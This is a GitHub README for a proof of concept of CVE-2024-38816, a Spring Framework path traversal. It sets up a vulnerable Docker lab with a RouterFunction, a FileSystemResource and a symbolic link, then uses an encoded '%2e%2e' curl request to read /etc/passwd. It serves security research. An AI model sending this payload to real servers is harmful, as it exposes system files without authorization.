Skip to content

WULINPIN/CVE-2024-38816-PoC

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

4 Commits
 
 
 
 
 
 
 
 
 
 

Repository files navigation

CVE-2024-38816 Proof of Concept (PoC)

This is a proof of concept for the CVE-2024-38816 vulnerability, demonstrating a path traversal exploit.

Execution Steps

  1. Build the Docker image: (Spring Boot 3.0.13, based on Spring Framework 6.0.3)

    docker build -t cve-2024-38816-poc .
    
  2. Run the container and expose port 8080 to the host machine:

    docker run -d -p 8080:8080 --name cve-2024-38816-poc cve-2024-38816-poc
    
  3. Run the following command to execute the PoC and confirm the vulnerability:

    curl http://localhost:8080/static/link/%2e%2e/etc/passwd
    

    If the contents of the /etc/passwd file are displayed, the vulnerability is confirmed.

Notes

This PoC was created based on an analysis of the release notes and commit logs. The behavior of the actual vulnerability may differ, so accuracy is not guaranteed. Use at your own risk.

Considerations

  1. The vulnerability was patched in Spring Framework 6.1.13, as confirmed by the release notes.

  2. Upon reviewing the release notes and related commit logs, I have identified the following two issues as potentially linked to this vulnerability:

  3. According to the security advisory, the following conditions likely need to be met for the attack to succeed:

    • RouterFunctions is used
    • FileSystemResource is used
    • Symbolic links are present
    • %-encoded characters are involved in the attack

Environment Setup

A Docker environment is used to reproduce the vulnerability.

  1. Create PathTraversalDemoApplication.java with the following code to set up static file routing using RouterFunction and FileSystemResource:

    public RouterFunction<ServerResponse> staticResourceRouter() {
        return RouterFunctions.resources("/static/**", new FileSystemResource("/app/static/"));
    }
    
  2. Add the following command to the Dockerfile to create a symbolic link:

    RUN ln -s /static /app/static/link
    
  3. Create a payload that leverages %-encoding to traverse directories through the symbolic link.

    • Path: /static/link/%2e%2e/etc/passwd
  4. Use the following curl command to execute the PoC and verify if the attack is successful:

    curl http://localhost:8080/static/link/%2e%2e/etc/passwd
    

    If the attack is successful, the contents of the /etc/passwd file will be displayed.

Disclaimer

This PoC is provided for educational and security research purposes. Before using this in a real system, ensure the vulnerability has been fixed and you have proper authorization. The author takes no responsibility for any misuse of this code.

About

CVE-2024-38816 Proof of Concept

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published